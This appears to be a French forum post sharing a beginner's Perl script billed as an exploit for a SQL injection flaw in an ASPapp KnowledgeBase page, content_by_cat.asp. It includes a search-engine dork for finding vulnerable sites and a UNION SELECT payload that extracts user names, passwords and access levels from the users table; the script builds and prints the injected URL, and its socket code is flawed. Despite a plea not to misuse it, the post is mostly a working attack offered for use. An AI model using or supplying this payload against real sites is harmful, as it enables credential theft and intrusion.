yop!
Juste un petit exploit codé a titre d'exemple ,avec Dannyblue (son 1er script Perl ^^ donc soyez pas méchant hein ;) )
Je le poste ici car il peu etre utilisé a titre d'exemple pour ceux qui voudrai , comme Dannyblue ,se lancer dans le Scripting Perl .
Attention , cet exploit exploite malgrés tout une faille qui est encore assez présente sur le web , aussi je tien a demander a ceux qui le testeront de RESPECTER le travail des admins et ainsi , de ne pas s'en servir a des fins destructrices .
Merci .
[code:1:2873f9cd93]#!/usr/local/bin/perl -w
use strict;
use IO::Socket::INET;
my $hote=$ARGV[0];
if (@ARGV < 1)
{
die "\n[0]-Usage: perl exploit.pl [Host] \n
Entrer l'URL de la cible (exemple: www.target.fr/content_by_cat.asp) \n\n
------------------------------------------------------------------------
- -
- Injection SQL ASPapp KnowledgeBase -
- -
-[~]Exploit coded By: KmkZ and DannyBlue of LiQuid Squad team -
- -
-[~] Bug found by :XCoRPITX --> www.xcorpitx-hack.com -
- -
- Dork: "content_by_cat.asp" -
- -
- Arguments : [URL]/content_by_cat.asp -
- -
------------------------------------------------------------------------\n
";
}
else
{
my $injection="?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users";
my $socket=IO::Socket::INET->new(Proto=>"tcp",PeerAdr=>"$hote",PeerPort=>"80");
$socket = ("$hote$injection");
print "[~] URL =>\n\n";
print $socket;
print "\n\n";
exit;
}[/code:1:2873f9cd93]